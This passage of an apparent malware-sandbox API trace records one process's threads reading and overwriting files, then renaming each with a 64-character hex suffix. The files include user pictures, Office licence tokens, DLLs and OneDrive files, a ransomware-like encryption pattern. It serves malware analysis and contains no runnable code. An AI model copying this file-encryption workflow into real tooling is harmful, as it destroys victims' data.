lpBuffer=0x75526e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8) returned 1 [0171.837] RtlInterlockedCompareExchange64 () returned 0x8 [0171.837] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0172.016] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x78e9210, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x78e9210, ReturnLength=0x708f9e4) returned 0x0 [0172.017] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpString2=".D2BCFCB9903C6ECF75C44864222A4BCBEE77EDD52ED9BA8DF26B3EB58AD9F934" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.D2BCFCB9903C6ECF75C44864222A4BCBEE77EDD52ED9BA8DF26B3EB58AD9F934") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.D2BCFCB9903C6ECF75C44864222A4BCBEE77EDD52ED9BA8DF26B3EB58AD9F934" [0172.017] GetProcessHeap () returned 0x270000 [0172.017] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x4333418 [0172.017] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x708f9d4, FileInformation=0x4333418, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0172.106] CloseHandle (hObject=0x5cc) returned 1 [0172.108] GetProcessHeap () returned 0x270000 [0172.110] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78e9160 | out: hHeap=0x270000) returned 1 [0172.116] RtlInterlockedCompareExchange64 () returned 0x7 [0172.116] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff) Thread: id = 107 os_tid = 0xae0 [0142.351] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.306] ReadFile (in: hFile=0x5a0, lpBuffer=0x750a298, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74ea160 | out: lpBuffer=0x750a298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74ea160) returned 1 [0156.306] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.317] WriteFile (in: hFile=0x5a0, lpBuffer=0x750a298*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74ea160 | out: lpBuffer=0x750a298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74ea160) returned 1 [0156.318] RtlInterlockedCompareExchange64 () returned 0x1 [0156.318] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.358] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x74ea210, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74ea210, ReturnLength=0x702fa7c) returned 0x0 [0156.359] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml", lpString2=".5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233" | out: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233" [0156.359] GetProcessHeap () returned 0x270000 [0156.359] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19a) returned 0x42465c0 [0156.359] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x702fa6c, FileInformation=0x42465c0, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0156.361] CloseHandle (hObject=0x5a0) returned 1 [0156.364] GetProcessHeap () returned 0x270000 [0156.366] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0156.372] RtlInterlockedCompareExchange64 () returned 0x4 [0156.372] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.512] ReadFile (in: hFile=0x5a0, lpBuffer=0x7492450, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0156.526] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.607] WriteFile (in: hFile=0x5a0, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, 
lpOverlapped=0x75e0048) returned 1 [0156.608] RtlInterlockedCompareExchange64 () returned 0x0 [0156.608] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.622] WriteFile (in: hFile=0x5a0, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.624] RtlInterlockedCompareExchange64 () returned 0x0 [0156.624] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.654] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.655] RtlInterlockedCompareExchange64 () returned 0x0 [0156.655] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.655] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0156.656] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", 
lpString2=".0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E" [0156.656] GetProcessHeap () returned 0x270000 [0156.656] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b8) returned 0x42fc9f8 [0156.656] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x702fa6c, FileInformation=0x42fc9f8, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0156.658] CloseHandle (hObject=0x598) returned 1 [0156.661] GetProcessHeap () returned 0x270000 [0156.663] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.663] RtlInterlockedCompareExchange64 () returned 0x1 [0156.663] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.832] ReadFile (in: hFile=0x58c, lpBuffer=0x7410188, nNumberOfBytesToRead=0x3c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050) returned 1 [0156.837] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.838] WriteFile (in: hFile=0x58c, lpBuffer=0x7410188*, nNumberOfBytesToWrite=0x3c00, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050) returned 1 [0156.842] RtlInterlockedCompareExchange64 () returned 0x0 [0156.842] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.843] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73f0100, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x73f0100, ReturnLength=0x702fa7c) returned 0x0 [0156.845] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", lpString2=".33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D" [0156.845] GetProcessHeap () returned 0x270000 [0156.845] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x4279f18 [0156.849] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x702fa6c, FileInformation=0x4279f18, Length=0x126, FileInformationClass=0xa) returned 0x0 [0156.852] CloseHandle (hObject=0x58c) returned 1 [0156.855] GetProcessHeap () returned 0x270000 [0156.857] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.857] RtlInterlockedCompareExchange64 () returned 0x1 [0156.857] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.861] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.861] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.862] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.863] RtlInterlockedCompareExchange64 () returned 0x0 [0156.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.864] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0156.866] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", lpString2=".CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C" [0156.866] GetProcessHeap () returned 0x270000 [0156.866] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x365e70 [0156.866] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x702fa6c, FileInformation=0x365e70, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0156.871] CloseHandle (hObject=0x598) returned 1 [0156.882] GetProcessHeap () returned 0x270000 [0156.883] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.883] RtlInterlockedCompareExchange64 () returned 0x1 [0156.883] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.980] ReadFile (in: hFile=0x58c, lpBuffer=0x7410188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050) returned 1 [0156.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.984] WriteFile (in: hFile=0x58c, lpBuffer=0x7410188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050) returned 1 [0156.986] RtlInterlockedCompareExchange64 () returned 0x0 [0156.986] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.989] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, 
ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0156.990] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpString2=".C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B" [0156.990] GetProcessHeap () returned 0x270000 [0156.990] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x146) returned 0x42573f8 [0156.990] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x702fa6c, FileInformation=0x42573f8, Length=0x146, FileInformationClass=0xa) returned 0x0 [0156.994] CloseHandle (hObject=0x4a8) returned 1 [0157.088] GetProcessHeap () returned 0x270000 [0157.089] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0157.090] RtlInterlockedCompareExchange64 () returned 0x2 [0157.090] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0158.514] ReadFile (in: hFile=0x5a4, lpBuffer=0x7410188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050) returned 1 [0158.516] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) 
returned 1 [0159.452] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x2e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0159.453] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0159.455] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x7422118, ReturnLength=0x702fa7c) returned 0x0 [0159.456] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", lpString2=".5E97B4FB87319F0811FB25901CC215AC0745989DDA3D04F57872F9552B20173E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.5E97B4FB87319F0811FB25901CC215AC0745989DDA3D04F57872F9552B20173E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.5E97B4FB87319F0811FB25901CC215AC0745989DDA3D04F57872F9552B20173E" [0159.456] GetProcessHeap () returned 0x270000 [0159.456] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x3237a0 [0159.456] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x702fa6c, FileInformation=0x3237a0, Length=0x150, FileInformationClass=0xa) returned 0x0 [0159.458] CloseHandle (hObject=0x590) returned 1 [0159.461] GetProcessHeap () returned 0x270000 [0159.463] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.463] RtlInterlockedCompareExchange64 () returned 0x3 [0159.463] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, 
lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.050] WriteFile (in: hFile=0x5b4, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0160.076] RtlInterlockedCompareExchange64 () returned 0x2 [0160.076] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.178] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x744a270, ReturnLength=0x702fa7c) returned 0x0 [0160.179] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif", lpString2=".0F3543C772ECECBAD798663A16AD3391CCA8A065343FB7B35250599DEB80E350" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif.0F3543C772ECECBAD798663A16AD3391CCA8A065343FB7B35250599DEB80E350") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif.0F3543C772ECECBAD798663A16AD3391CCA8A065343FB7B35250599DEB80E350" [0160.179] GetProcessHeap () returned 0x270000 [0160.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x74204e8 [0160.180] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x702fa6c, FileInformation=0x74204e8, Length=0x168, FileInformationClass=0xa) returned 0x0 [0160.182] CloseHandle (hObject=0x5ac) returned 1 [0160.205] GetProcessHeap () 
returned 0x270000 [0160.206] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0160.206] RtlInterlockedCompareExchange64 () returned 0x3 [0160.206] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.334] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x73e00f8, ReturnLength=0x702fa7c) returned 0x0 [0160.336] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat", lpString2=".B3FF4984F09C1FA30C111C32D08D831EEE86F4EE4B3BD49D0E32096605DAC157" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat.B3FF4984F09C1FA30C111C32D08D831EEE86F4EE4B3BD49D0E32096605DAC157") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat.B3FF4984F09C1FA30C111C32D08D831EEE86F4EE4B3BD49D0E32096605DAC157" [0160.336] GetProcessHeap () returned 0x270000 [0160.336] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x174) returned 0x427a9f0 [0160.336] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x702fa6c, FileInformation=0x427a9f0, Length=0x174, FileInformationClass=0xa) returned 0x0 [0160.338] CloseHandle (hObject=0x5a8) returned 1 [0160.371] GetProcessHeap () returned 0x270000 [0160.373] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0160.374] RtlInterlockedCompareExchange64 () returned 0x1 [0160.374] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, 
lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.445] ReadFile (in: hFile=0x5a8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0160.445] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.476] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0160.476] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.511] ReadFile (in: hFile=0x5ac, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0160.511] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.526] ReadFile (in: hFile=0x594, lpBuffer=0x7552400, nNumberOfBytesToRead=0x8000, 